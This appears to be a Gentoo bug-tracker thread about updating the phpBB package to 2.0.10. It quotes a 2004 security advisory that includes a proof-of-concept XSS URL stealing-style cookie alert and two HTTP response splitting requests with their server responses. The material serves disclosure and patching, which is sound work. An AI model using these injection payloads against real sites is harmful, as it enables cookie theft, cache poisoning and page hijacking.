# Fixed one vulnerability in admin_board.php - Xore # Added checking for proper session id characters to sessions and viewtopic to prevent injections - Bartlomiej Korupczynski # Fixed injection vulnerabilities possible with linked avatars # Implemented unsetting globalised variables # Limited confirm switch to POST variable in posting # Changed IP code in common.php to prevent IP spoofing # Updated visual confirmation mod [pre-edited files] # Moved obtaining word censors in modcp out of topic generation loop [increased performance/lower query count] - spotted by R45 # Added the ability to link to https/ftps sites using the img bbcode tag # Fixed user online information in admin/index.php # Fixed getting group moderator in groupcp.php if running oracle backend - spotted by pakman # Fixed use of non-existing result variable in modcp (poster_id instead of user_id) # Fixed several vulnerabilities (XSS, SQL Injection and path disclosure) only possible with register_globals enabled - Matthew C. Kavanagh, Janek Vind # Fixed problem with SID not delivered to next page in groupcp.php Reproducible: Always Steps to Reproduce:
Removing php-bugs from cc: as this is a webapps package. Target keywords = "~alpha ~amd64 ~ppc ~sparc ~x86"
2.0.10 also includes security fixes, so we should bump to that instead. From phpBB forums : "phpBB Group are pleased to announce the release of phpBB 2.0.10 the "Murphy is furry" release. This release had been made to fix one security related issue and some bugs introduced by the 2.0.9 release, plus two new ones." "The main problem arised in 2.0.9 was for those having register_globals set to on and magic_quotes_gpc set to off. For those the board was nearly unusable. Additionally with the release of PHP5 users had to change a php.ini variable, which is now simulated by phpBB. Support for phpBB 2.0.x running under PHP5 is still not provided here." Looks like it solves this : ///////////////////////////////////////////////////////////////////// //===================>> Security Advisory <<=======================// ///////////////////////////////////////////////////////////////////// --------------------------------------------------------------------- ---[ PhpBB HTTP Response Splitting & Cross Site Scripting vuln. --------------------------------------------------------------------- --[ Author: Ory Segal , Sanctum inc. http://www.SanctumInc.com --[ Discovery Date: 14/7/2004 --[ Release Date: 18/7/2004 --[ Product: PhpBB 2.0.x (was tested on 2.0.4, 2.0.9) --[ Severity: High --[ HTTP Response Splitting details Two scripts are vulnerable to HTTP Response Splitting attacks: - /phpBB2/privmsg.php ('mode' parameter) - /phpBB2/login.php ('redirect' parameter) These vulnerabilities may allow an attacker to perform various attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and perform cross-site scripting attacks. --[ Cross Site Scripting details When gpc magic quotes are turned off in php.ini, the script '/phpBB2/search.php' is vulnerable to XSS in the 'search_author' parameter. This vulnerability may lead to theft of cookies associated with the domain, or execution of client-side scripts in the user's browser. --[ Additional information Detailed information on HTTP Response Splitting can be found in the white paper "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" (Written by Amit Klein of Sanctum inc.) http://www.sanctuminc.com/pdf/WhitePaper_HTTPResponse.pdf Note [1]: The HTTP Response Splitting vulnerabilities do not require the user to be logged in to the application. Note [2]: These vulnerabilities were discovered on PhpBB 2.0.9, installed on Win2K server with IIS/5.0, and PHP/4.3.4 (was also validated on PHP/4.3.8) Note [3]: In theory these HTTP Response Splitting vulnerabilities should work on Microsoft web servers, WebSTAR and Xitami. --[ Exploit Requests / URLs -[ XSS Example The following request will present a pop-up window containing the current session's cookies: (REQUEST IS WORD-WRAPPED!) http://SERVER/phpBB2/search.php?search_author='<script>alert(document .cookie)</script> -[ HTTP Response Splitting Example [1] The following request will cause the application to return a split response (REQUEST and RESPONSE ARE WORD-WRAPPED!) [REQUEST] POST /phpBB2/login.php HTTP/1.0 Host: SERVER User-Agent: Mozilla/4.7 [en] (WinNT; I) Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Content-Type: application/x-www-form-urlencoded Content-length: 129 logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha! [RESPONSE] HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 14 Jul 2004 09:48:04 GMT Content-type: text/html X-Powered-By: PHP/4.3.4 Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Thu, 14-Jul-2005 09:48:04 GMT; path=/ Set-Cookie: phpbb2mysql_sid=b389d63f8226cc6c8ad349b3aadf41f3; path=/ Refresh: 0; URL=http://SERVER/phpBB2foobar Content-Length: 0 HTTP/1.0 200 OK Content-Length: 7 Gotcha! ... ... ... -[ HTTP Response Splitting Example [2] The following request will cause the application to return a split response (REQUEST and RESPONSE ARE WORD-WRAPPED!) [REQUEST] GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d %0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha! HTTP/1.0 Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.7 [en] (WinNT; I) Host: SERVER [RESPONSE] HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 14 Jul 2004 12:42:17 GMT Content-type: text/html X-Powered-By: PHP/4.3.4 Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Thu, 14-Jul-2005 12:42:17 GMT; path=/ Set-Cookie: phpbb2mysql_sid=74d20cacbfcd9d7b16e0bb86a345aea3; path=/ Refresh: 0; URL=http://SERVER/phpBB2login.php?redirect=privmsg .php&folder=inbox&mode=foobar Content-Length: 0 HTTP/1.0 200 OK Content-Length: 7 Gotcha!&sid=74d20cacbfcd9d7b16e0bb86a345aea3 ... ... ... --[ Solution According to the vendor, these issues are addressed in PhpBB 2.0.10 --[ Acknowledgements Amit Klein, for helping with the research of the HTTP Response Splitting vulnerabilities in PhpBB (and for discovering HTTP Response Splitting in the first place ----------------------------------------------------------------------------
~ package : updating status whiteboard
2.0.10 is in cvs now
Couldn't this be closed with the 2.0.8 ebuild getting removed from the tree, since 2.0.10 is available there now? Shouldn't need a GLSA cause phpBB is ~arch masked anyways.
web-apps please remove the vulnerable version if it is no longer needed so we can close this bug.
Closing : security job is finished on this one. Cleaning old versions (vulnerable or not) is maintainers job, webapps don't forget to clean :)
Cleaned
